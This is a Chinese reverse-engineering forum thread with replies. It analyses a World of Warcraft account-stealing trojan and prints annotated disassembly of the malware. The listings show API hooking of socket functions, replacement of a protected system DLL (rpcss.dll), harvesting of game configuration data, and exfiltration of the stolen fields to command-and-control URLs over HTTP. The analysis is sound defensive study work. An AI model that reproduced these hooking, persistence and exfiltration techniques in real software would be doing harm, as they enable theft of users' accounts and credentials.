10002526 |. 05 25010000 add eax, 125 ; rel32 = (esi+12A) - (target+5): valid only once this stub sits at the target address
1000252B |. 8986 33030000 mov dword ptr [esi+333], eax 把跳转的偏移保存到地址10017473h,这里内存显示E9 3E 26 5F 9E
10002531 |. 5E pop esi
10002532 |. 5B pop ebx
10002533 \. C3 retn[/code]内存显示内容:
10017270 FF 55 8B EC E9 B3 D9 A0 61
10017472 E9 3E 26 5F 9E ?&_瀢s
把send函数前5个字节保存到木马模块内存内容,这里显示如下:
1001736E 8B FF 55 8B EC 00 00 00 00 00 00 00 00 00 00 00 ?U嬱...........
[100177B7]地址的指令为jmp ws2_32.71A26774,跳转到71A26774
100177B7 - E9 B8EFA061 jmp ws2_32.71A26774
还没有被hook的recv函数头部:
71A2676F ws2_32.recv 8BFF mov edi, edi
71A26771 55 push ebp
71A26772 8BEC mov ebp, esp
71A26774 83EC 10 sub esp, 10
通过hook send,recv,closesocket函数读取信息。
总结下流程:
1.病毒运行后释放动态库文件~358629.~~~和配置文件"C:\system32\t329076.ini",遍历进程,如果发现avp.exe,就拷贝"C:\system32\rundll32.exe"为同目录下的t329076.exe,并运行t329076.exe,以GetName和病毒路径为参数加载~358629.~~~;否则就直接调用rundll32.exe以同样参数加载~358629.~~~。
2.在~358629.~~~中,设置自己为"SeDebugPrivilege"权限,在explorer.exe进程中创建远程线程,调用sfc_os.#5去掉"C:\system32\rpcss.dll"系统保护,拷贝"C:\system32\rpcss.dll"为同目录下的t3rpcss.dll,拷贝~358629.~~~为rpcss.dll,释放动态库文件"C:\system32\t329111.dll",删除病毒源文件。
3.当rpcss.dll被svchost.exe加载后,就会调用t329076.dll,在t329076.dll中,遍历查找魔兽游戏进程,hook了send,recv,closesocket函数,窃取用户信息。
[attach]32354[/attach] 嘎嘎,学习下了。呵呵 支持新人发病毒分析的文章 看着眼晕。。。。。。。。。。。。 继续加油。。不够详细
看木马的分析再决定加精与否 这么长的代码啊。 木马部分,分析的一般,而且还有几处低级错误,再仔细看看吧。
改完再决定是否加精 [i=s] 本帖最后由 qiang 于 2010-1-29 18:00 编辑 [/i]
补充:截取游戏信息发送。
1000475C . 60 pushad
; sub_1000475C — hook-side entry stub.  Saves all registers twice, overwrites
; the saved-ESP slot ([esp+C]) of the inner pushad frame with esp+44 (the first
; dword above the return address), calls 10004772 (which reads the saved
; registers through [esp+20]), then restores everything so the interrupted
; caller sees no register change.
1000475D . 60 pushad
1000475E . 8BC4 mov eax, esp
10004760 . 83C0 44 add eax, 44 ; eax = address just above this stub's return address
10004763 . 8BDC mov ebx, esp
10004765 . 83C3 0C add ebx, 0C ; ebx = &saved ESP inside the inner pushad frame
10004768 . 8903 mov dword ptr [ebx], eax
1000476A . E8 03000000 call 10004772 关键call 11
1000476F . 61 popad
10004770 . 61 popad
10004771 . C3 retn
关键call 11,游戏信息处理,发信
10004772 /$ 56 push esi
; sub_10004772 — builds the game-account fields and triggers the send.
; 1) 10004699 reads realmName from the game's Config.wtf into 100123E4.
; 2) [esp+20] — with the caller's pushad frame directly above the return
;    address this appears to be the saved ECX slot — is formatted with "%d"
;    into 10012E0C.
; 3) the dword at *[100151E8] selects a region string (cases D..29, see the
;    OllyDbg case annotations) copied into 100122E0; other values are formatted
;    there with the template at 1001CA44 instead.
; 4) 10003FA2 (call 13) formats and sends the collected fields.
10004773 |. E8 21FFFFFF call 10004699 关键call 12 读取配置文件信息
10004778 |. FF7424 20 push dword ptr [esp+20] ; /<%d> ; value from the caller's register frame
1000477C |. 8B35 90610110 mov esi, dword ptr [<&USER32.wsprint>; |user32.wsprintfA
10004782 |. 68 54CA0110 push 1001CA54 ; |Format = "%d"
10004787 |. 68 0C2E0110 push 10012E0C ; |s = t329076.10012E0C ; later sent as one of the d-fields
1000478C |. FFD6 call esi ; \wsprintfA
1000478E |. A1 E8510110 mov eax, dword ptr [100151E8]
10004793 |. C705 C88A0110 0>mov dword ptr [10018AC8], 1 ; global flag set; its readers are not in this listing
1000479D |. 83C4 0C add esp, 0C
100047A0 |. 8B00 mov eax, dword ptr [eax] ; eax = region/realm id
100047A2 |. 83F8 12 cmp eax, 12 ; Switch (cases D..29) 判断游戏大区
100047A5 |. 77 1E ja short 100047C5 ; ids above 0x12 use the second compare chain
100047A7 |. 74 4A je short 100047F3 ; 0x12
100047A9 |. 8BC8 mov ecx, eax
100047AB |. 83E9 0D sub ecx, 0D
100047AE |. 74 0E je short 100047BE ; 0xD
100047B0 |. 49 dec ecx
100047B1 |. 74 40 je short 100047F3 ; 0xE
100047B3 |. 49 dec ecx
100047B4 |. 74 4B je short 10004801 ; 0xF
100047B6 |. 49 dec ecx
100047B7 |. 74 05 je short 100047BE ; 0x10
100047B9 |. 49 dec ecx
100047BA |. 74 3E je short 100047FA ; 0x11
100047BC |. EB 1C jmp short 100047DA ; anything else -> default
100047BE |> 68 4CCA0110 push 1001CA4C ; Cases D,10 of switch 100047A2
100047C3 |. EB 41 jmp short 10004806
100047C5 |> 8BC8 mov ecx, eax
100047C7 |. 83E9 13 sub ecx, 13
100047CA |. 74 35 je short 10004801 ; 0x13
100047CC |. 83E9 11 sub ecx, 11
100047CF |. 74 29 je short 100047FA ; 0x24
100047D1 |. 83E9 03 sub ecx, 3
100047D4 |. 74 1D je short 100047F3 ; 0x27
100047D6 |. 49 dec ecx
100047D7 |. 49 dec ecx
100047D8 |. 74 12 je short 100047EC ; 0x29
100047DA |> 50 push eax ; Default case of switch 100047A2 ; raw id as the format argument
100047DB |. 68 44CA0110 push 1001CA44 ; format template (content not shown)
100047E0 |. 68 E0220110 push 100122E0
100047E5 |. FFD6 call esi ; wsprintfA(100122E0, fmt, id)
100047E7 |. 83C4 0C add esp, 0C
100047EA |. EB 26 jmp short 10004812
100047EC |> 68 3CCA0110 push 1001CA3C ; ASCII "十区"; Case 29 of switch 100047A2
100047F1 |. EB 13 jmp short 10004806
100047F3 |> 68 34CA0110 push 1001CA34 ; Cases E,12,27 of switch 100047A2
100047F8 |. EB 0C jmp short 10004806
100047FA |> 68 2CCA0110 push 1001CA2C ; ASCII "五区"; Cases 11,24 of switch 100047A2
100047FF |. EB 05 jmp short 10004806
10004801 |> 68 24CA0110 push 1001CA24 ; ASCII "三区"; Cases F,13 of switch 100047A2
10004806 |> 68 E0220110 push 100122E0 ; |dest = t329076.100122E0
1000480B |. E8 70060000 call <jmp.&MSVCRT.strcpy> ; \strcpy ; region name -> 100122E0
10004810 |. 59 pop ecx
10004811 |. 59 pop ecx
10004812 |> E8 8BF7FFFF call 10003FA2 关键call 13,发送游戏信息
10004817 |. 5E pop esi
10004818 \. C3 retn
关键call 12
10004699 /$ 55 push ebp
; sub_10004699 — extracts realmName from the game client's WTF\Config.wtf.
; GetModuleFileNameA(NULL) gives the host process' exe path (the game, since
; this DLL runs inside it); the file name is cut at the last '\' and
; "\WTF\Config.wtf" appended.  The file is read into a heap buffer, strstr
; locates "realmName", and the text between the next two occurrences of the
; one-char string at 1001CA04 (not displayed — presumably the quote character;
; confirm) is copied by 10001E02 into 100123E4, which 10003FA2 later sends.
; Note: the strcat at 100046E1 is unbounded into the 0x108-byte local.66 buffer.
1000469A |. 8BEC mov ebp, esp
1000469C |. 81EC 08010000 sub esp, 108 ; local.66 = 0x108-byte path buffer
100046A2 |. 8D85 F8FEFFFF lea eax, [local.66]
100046A8 |. 68 04010000 push 104 ; /BufSize = 104 (260.)
100046AD |. 50 push eax ; |PathBuffer
100046AE |. 6A 00 push 0 ; |hModule = NULL ; NULL -> path of the host process executable
100046B0 |. FF15 70600110 call dword ptr [<&KERNEL32.GetModule>; \GetModuleFileNameA
100046B6 |. 8D85 F8FEFFFF lea eax, [local.66]
100046BC |. 6A 5C push 5C ; /c = 5C ('\')
100046BE |. 50 push eax ; |s
100046BF |. FF15 04610110 call dword ptr [<&MSVCRT.strrchr>] ; \strrchr ; find last path separator
100046C5 |. 59 pop ecx
100046C6 |. 85C0 test eax, eax
100046C8 |. 59 pop ecx
100046C9 |. 0F84 8B000000 je 1000475A ; no separator -> leave (nothing pushed yet)
100046CF |. 8020 00 and byte ptr [eax], 0 ; truncate to the directory
100046D2 |. 53 push ebx
100046D3 |. 56 push esi
100046D4 |. 57 push edi
100046D5 |. 8D85 F8FEFFFF lea eax, [local.66]
100046DB |. 68 14CA0110 push 1001CA14 ; /src = "\WTF\Config.wtf"
100046E0 |. 50 push eax ; |dest
100046E1 |. E8 28080000 call <jmp.&MSVCRT.strcat> ; \strcat 连接字符串,获得配置文件Config.wtf的路径 ; no length check against the 0x108-byte buffer
100046E6 |. 8D85 F8FEFFFF lea eax, [local.66]
100046EC |. 50 push eax
100046ED |. E8 6CDFFFFF call 1000265E 打开文件,读取游戏信息 ; result in eax is used as the allocation size below — presumably the file size; confirm
100046F2 |. 8BF0 mov esi, eax
100046F4 |. 56 push esi
100046F5 |. E8 56070000 call <jmp.&MSVCRT.operator new> ; buffer of that size
100046FA |. 56 push esi
100046FB |. 8945 FC mov [local.1], eax ; local.1 = file buffer
100046FE |. 50 push eax
100046FF |. 8D85 F8FEFFFF lea eax, [local.66]
10004705 |. 50 push eax
10004706 |. E8 0DDFFFFF call 10002618 ; read(path, buffer, size) — same helper used for the ini file in 10003BC2
1000470B |. 8B35 24610110 mov esi, dword ptr [<&MSVCRT.strstr>>; msvcrt.strstr
10004711 |. 68 08CA0110 push 1001CA08 ; /s2 = "realmName"
10004716 |. FF75 FC push [local.1] ; |s1
10004719 |. FFD6 call esi ; \strstr
1000471B |. 83C4 24 add esp, 24
1000471E |. 85C0 test eax, eax
10004720 |. 74 2C je short 1000474E ; key not present -> free and return
10004722 |. BF 04CA0110 mov edi, 1001CA04 ; delimiter string (content not displayed)
10004727 |. 57 push edi
10004728 |. 50 push eax
10004729 |. FFD6 call esi ; first delimiter after "realmName"
1000472B |. 8BD8 mov ebx, eax
1000472D |. 59 pop ecx
1000472E |. 85DB test ebx, ebx
10004730 |. 59 pop ecx
10004731 |. 74 1B je short 1000474E
10004733 |. 43 inc ebx ; ebx = start of the value
10004734 |. 57 push edi
10004735 |. 53 push ebx
10004736 |. FFD6 call esi ; closing delimiter
10004738 |. 59 pop ecx
10004739 |. 85C0 test eax, eax
1000473B |. 59 pop ecx
1000473C |. 74 10 je short 1000474E
1000473E |. 8020 00 and byte ptr [eax], 0 ; terminate the value in place
10004741 |. 68 E4230110 push 100123E4 ; destination global
10004746 |. 53 push ebx
10004747 |. E8 B6D6FFFF call 10001E02 ; copies the realm name to 100123E4 (body not shown)
1000474C |. 59 pop ecx
1000474D |. 59 pop ecx
1000474E |> FF75 FC push [local.1]
10004751 |. E8 DC060000 call 10004E32 ; presumably frees the file buffer — confirm
10004756 |. 59 pop ecx
10004757 |. 5F pop edi
10004758 |. 5E pop esi
10004759 |. 5B pop ebx
1000475A |> C9 leave
1000475B \. C3 retn
关键call 13,发送游戏信息,代码如下:
10003FA2 /$ 55 push ebp
; sub_10003FA2 — serialises the harvested fields into a query string and sends it.
; wsprintfA builds the string from the template at 1001897C (d00..d90 fields);
; the "9*&" filler embedded in the template and in the field strings is removed
; afterwards by 100027D2, then 10003E5A (call 14) transmits local.325.
; Known inputs visible on this page: 100122E0 (region, 10004772),
; 100123E4 (realmName, 10004699), 10012E0C ("%d" value, 10004772).
; The other globals are not populated in any listing here.
10003FA3 |. 8BEC mov ebp, esp
10003FA5 |. 81EC 14050000 sub esp, 514 ; local.325 = output buffer
10003FAB |. 68 3C300110 push 1001303C
10003FB0 |. E8 7CFCFFFF call 10003C31 取各个信息长度 ; result used as a %u argument below
10003FB5 |. 50 push eax
10003FB6 |. 68 382F0110 push 10012F38
10003FBB |. FF35 2C2F0110 push dword ptr [10012F2C]
10003FC1 |. 8D85 ECFAFFFF lea eax, [local.325]
10003FC7 |. FF35 302F0110 push dword ptr [10012F30]
10003FCD |. 68 753D0110 push 10013D75
10003FD2 |. 68 9D470110 push 1001479D
10003FD7 |. FF35 202F0110 push dword ptr [10012F20]
10003FDD |. FF35 142F0110 push dword ptr [10012F14]
10003FE3 |. FF35 102F0110 push dword ptr [10012F10]
10003FE9 |. 68 0C2E0110 push 10012E0C ; ASCII "2090008637" ; value formatted by 10004772
10003FEE |. 68 082D0110 push 10012D08
10003FF3 |. 68 002B0110 push 10012B00
10003FF8 |. 68 F4270110 push 100127F4
10003FFD |. 68 F0260110 push 100126F0
10004002 |. 68 EC250110 push 100125EC
10004007 |. 68 E4230110 push 100123E4 ; realmName from Config.wtf
1000400C |. 68 E0220110 push 100122E0 ; | ; region string
10004011 |. 68 C04D0110 push 10014DC0 ; |<%s> = ""
10004016 |. 68 7C890110 push 1001897C ; |Format = "?Gam9*&e=29¶=%s&%ves=076&d00=%s&d01=%s&d10=%s&d11=%
s&d21=%s&d30=%s&d31=%s&d32=%s&d40=%u&d45=%u&d42=%u&d60=%s9*&&d61=%s&d70=%d&d71=%d&d50=%s&d90=%d&d62=%s"
1000401B |. 50 push eax ; |s
1000401C |. FF15 90610110 call dword ptr [<&USER32.wsprintfA>] ; \wsprintfA 发送游戏信息格式化 ; no size limit on local.325 beyond wsprintf's own 1024-char cap
10004022 |. 68 08500010 push 10005008
10004027 |. 8D85 ECFAFFFF lea eax, [local.325]
1000402D |. 68 08880110 push 10018808 ; ASCII "9*&"
10004032 |. 50 push eax
10004033 |. E8 9AE7FFFF call 100027D2 字符处理,除去9*&字符 ; strip the "9*&" filler in place
10004038 |. 83C4 60 add esp, 60 ; 1 + 20 + 3 = 24 dwords of cdecl args
1000403B |. 8D85 ECFAFFFF lea eax, [local.325]
10004041 |. 50 push eax
10004042 |. E8 13FEFFFF call 10003E5A 关键call 14,网络发信
10004047 |. 59 pop ecx
10004048 |. C9 leave
10004049 \. C3 retn
关键call 14,网络发信,代码如下:
10003E5A /$ 55 push ebp
; sub_10003E5A(query) — posts the query string to up to three URL bases.
; local.66 (0x104 bytes) is initialised with the byte at 10005008 followed by
; zeros.  For each base whose first byte is non-zero — 100149B0 (the decoded
; C2 URL from 10003BC2), 10014BB8 and 10014CBC — the URL is built as
; wsprintfA("%s%s", base, query) into local.716 and passed to
; 10002E62(url, local.66, &local.1, 0x104) (call 15).  The three branches are
; identical apart from the base address.
10003E5B |. 8BEC mov ebp, esp
10003E5D |. 81EC 300B0000 sub esp, 0B30 ; local.716 = URL buffer
10003E63 |. A0 08500010 mov al, byte ptr [10005008]
10003E68 |. 53 push ebx
10003E69 |. 56 push esi
10003E6A |. 57 push edi
10003E6B |. 6A 40 push 40
10003E6D |. 8885 F8FEFFFF mov byte ptr [ebp-108], al ; local.66[0] = *10005008
10003E73 |. 59 pop ecx ; ecx = 0x40 dwords
10003E74 |. 33C0 xor eax, eax
10003E76 |. 8DBD F9FEFFFF lea edi, dword ptr [ebp-107]
10003E7C |. 803D B0490110 0>cmp byte ptr [100149B0], 0 ; first base present? (flags survive the string ops below)
10003E83 |. F3:AB rep stos dword ptr es:[edi] ; zero local.66[1..0x103]
10003E85 |. 8B35 90610110 mov esi, dword ptr [<&USER32.wsprint>; user32.wsprintfA
10003E8B |. BB 34710110 mov ebx, 10017134 ; ASCII "%s%s"
10003E90 |. 66:AB stos word ptr es:[edi]
10003E92 |. AA stos byte ptr es:[edi]
10003E93 |. BF 04010000 mov edi, 104 ; edi = buffer size passed to 10002E62
10003E98 |. 74 2D je short 10003EC7 ; base 1 empty -> skip
10003E9A |. FF75 08 push [arg.1] ; /<%s> ; query string
10003E9D |. 8D85 D0F4FFFF lea eax, [local.716] ; |
10003EA3 |. 68 B0490110 push 100149B0 ; |<%s> = "" ; base 1 (C2 URL decoded in 10003BC2)
10003EA8 |. 53 push ebx ; |Format => "%s%s"
10003EA9 |. 50 push eax ; |s
10003EAA |. FFD6 call esi ; \wsprintfA
10003EAC |. 8D45 FC lea eax, [local.1] ; bytes-read out-parameter
10003EAF |. 57 push edi
10003EB0 |. 50 push eax
10003EB1 |. 8D85 F8FEFFFF lea eax, [local.66]
10003EB7 |. 50 push eax
10003EB8 |. 8D85 D0F4FFFF lea eax, [local.716]
10003EBE |. 50 push eax
10003EBF |. E8 9EEFFFFF call 10002E62 关键call 15,网络连接
10003EC4 |. 83C4 20 add esp, 20 ; 4 + 4 dwords
10003EC7 |> 803D B84B0110 0>cmp byte ptr [10014BB8], 0 ; base 2 present?
10003ECE |. 74 2D je short 10003EFD
10003ED0 |. FF75 08 push [arg.1]
10003ED3 |. 8D85 D0F4FFFF lea eax, [local.716]
10003ED9 |. 68 B84B0110 push 10014BB8 ; base 2
10003EDE |. 53 push ebx
10003EDF |. 50 push eax
10003EE0 |. FFD6 call esi
10003EE2 |. 8D45 FC lea eax, [local.1]
10003EE5 |. 57 push edi
10003EE6 |. 50 push eax
10003EE7 |. 8D85 F8FEFFFF lea eax, [local.66]
10003EED |. 50 push eax
10003EEE |. 8D85 D0F4FFFF lea eax, [local.716]
10003EF4 |. 50 push eax
10003EF5 |. E8 68EFFFFF call 10002E62
10003EFA |. 83C4 20 add esp, 20
10003EFD |> 803D BC4C0110 0>cmp byte ptr [10014CBC], 0 ; base 3 present?
10003F04 |. 74 2D je short 10003F33
10003F06 |. FF75 08 push [arg.1]
10003F09 |. 8D85 D0F4FFFF lea eax, [local.716]
10003F0F |. 68 BC4C0110 push 10014CBC ; base 3
10003F14 |. 53 push ebx
10003F15 |. 50 push eax
10003F16 |. FFD6 call esi
10003F18 |. 8D45 FC lea eax, [local.1]
10003F1B |. 57 push edi
10003F1C |. 50 push eax
10003F1D |. 8D85 F8FEFFFF lea eax, [local.66]
10003F23 |. 50 push eax
10003F24 |. 8D85 D0F4FFFF lea eax, [local.716]
10003F2A |. 50 push eax
10003F2B |. E8 32EFFFFF call 10002E62
10003F30 |. 83C4 20 add esp, 20
10003F33 |> 5F pop edi
10003F34 |. 5E pop esi
10003F35 |. 5B pop ebx
10003F36 |. C9 leave
10003F37 \. C3 retn
关键call 15,用URL方式发信,代码如下:
10002E62 /$ 55 push ebp
; sub_10002E62(url, buf, &bytes_read, buf_size) — fetches the URL and returns 1.
; The four calls go through import slots at 100122CC..100122D8 whose names are
; not displayed; their argument shapes (5-arg open with agent "IE6.0", 6-arg
; open-URL with flag 0x80000000, 4-arg read into buf, 1-arg close) match a
; WinINet open/open-URL/read/close sequence — confirm against the resolved
; imports.  The open/open-URL pair is retried up to three times
; (local.1 counts 2,1,0).  The response body is read once into buf
; (at most buf_size bytes after memset 0) and otherwise ignored; the return
; value is always 1.
10002E63 |. 8BEC mov ebp, esp
10002E65 |. 51 push ecx ; local.1 = retry counter
10002E66 |. 53 push ebx
10002E67 |. 56 push esi
10002E68 |. 57 push edi
10002E69 |. FF75 08 push [arg.1]
10002E6C |. E8 51FCFFFF call 10002AC2 ; pre-processes the URL string (body not shown)
10002E71 |. 59 pop ecx
10002E72 |. C745 FC 0200000>mov [local.1], 2 ; 3 attempts in total
10002E79 |. 33F6 xor esi, esi ; esi = 0, reused for every NULL/0 argument
10002E7B |> 56 /push esi
10002E7C |. 56 |push esi
10002E7D |. 56 |push esi
10002E7E |. 56 |push esi
10002E7F |. 68 F0880110 |push 100188F0 ; ASCII "IE6.0" ; user-agent string, first argument
10002E84 |. FF15 D4220110 |call dword ptr [100122D4] ; session open (see header)
10002E8A |. 8BD8 |mov ebx, eax ; ebx = session handle
10002E8C |. 3BDE |cmp ebx, esi
10002E8E |. 74 1F |je short 10002EAF ; failed -> retry
10002E90 |. 56 |push esi
10002E91 |. 68 00000080 |push 80000000 ; flags
10002E96 |. 56 |push esi
10002E97 |. 56 |push esi
10002E98 |. FF75 08 |push [arg.1] ; url
10002E9B |. 53 |push ebx ; session handle
10002E9C |. FF15 D8220110 |call dword ptr [100122D8] ; open URL (see header)
10002EA2 |. 8BF8 |mov edi, eax ; edi = request handle
10002EA4 |. 3BFE |cmp edi, esi
10002EA6 |. 75 13 |jnz short 10002EBB ; success -> read
10002EA8 |. 53 |push ebx
10002EA9 |. FF15 CC220110 |call dword ptr [100122CC] ; close the session before retrying
10002EAF |> 8B45 FC |mov eax, [local.1]
10002EB2 |. FF4D FC |dec [local.1]
10002EB5 |. 85C0 |test eax, eax
10002EB7 |.^ 75 C2 \jnz short 10002E7B ; loop while the old counter was non-zero
10002EB9 |. EB 2F jmp short 10002EEA ; all attempts failed -> still returns 1
10002EBB |> 68 04010000 push 104 ; /n = 104 (260.)
10002EC0 |. 56 push esi ; |c
10002EC1 |. FF75 0C push [arg.2] ; |s
10002EC4 |. E8 7B1F0000 call <jmp.&MSVCRT.memset> ; \memset ; clear buf (hard-coded 0x104, not arg.4)
10002EC9 |. 83C4 0C add esp, 0C
10002ECC |. FF75 10 push [arg.3] ; &bytes_read
10002ECF |. FF75 14 push [arg.4] ; buf_size
10002ED2 |. FF75 0C push [arg.2] ; buf
10002ED5 |. 57 push edi ; request handle
10002ED6 |. FF15 D0220110 call dword ptr [100122D0] ; read response (see header)
10002EDC |. 57 push edi
10002EDD |. FF15 CC220110 call dword ptr [100122CC] ; close request handle
10002EE3 |. 53 push ebx
10002EE4 |. FF15 CC220110 call dword ptr [100122CC] ; close session handle
10002EEA |> 6A 01 push 1
10002EEC |. 58 pop eax ; return 1 unconditionally
10002EED |. 5F pop edi
10002EEE |. 5E pop esi
10002EEF |. 5B pop ebx
10002EF0 |. C9 leave
10002EF1 \. C3 retn 今天要学习各位大侠 分析得很好~建议加精~发个技术贴也不容易啊~给点鼓励啊!别抹杀了别人的激情~ [quote]标题:魔兽盗号木马Trojan.Win32.OnlineGame.PSW分析
链接:[url]http://www.unpack.cn/viewthread.php?tid=45323[/url]
贴者:qiang
日期: 2010-1-27 23:13[/quote] 和我前段时间看的一个xy2的盗号木马的关键代码几乎一样 [b]回复 [url=http://www.unpack.cn/redirect.php?goto=findpost&pid=594477&ptid=45323]12#[/url] [i]小子贼野[/i] [/b]
这些木马以一个系列出现,代码风格相似或者相同,针对不同的游戏。 呵呵 文如其名 见过好多次这个样本 嘎嘎,学习下了。呵呵 [b]回复 [url=http://bbs.unpack.cn/redirect.php?goto=findpost&pid=596932&ptid=45323]13#[/url] [i]qiang[/i] [/b]
难怪我说么看着那么熟悉 分析很详细,学习中- - 好强大!纠结啊,自己啥时候能到那个境界? 不错,分析的很详细··学习了··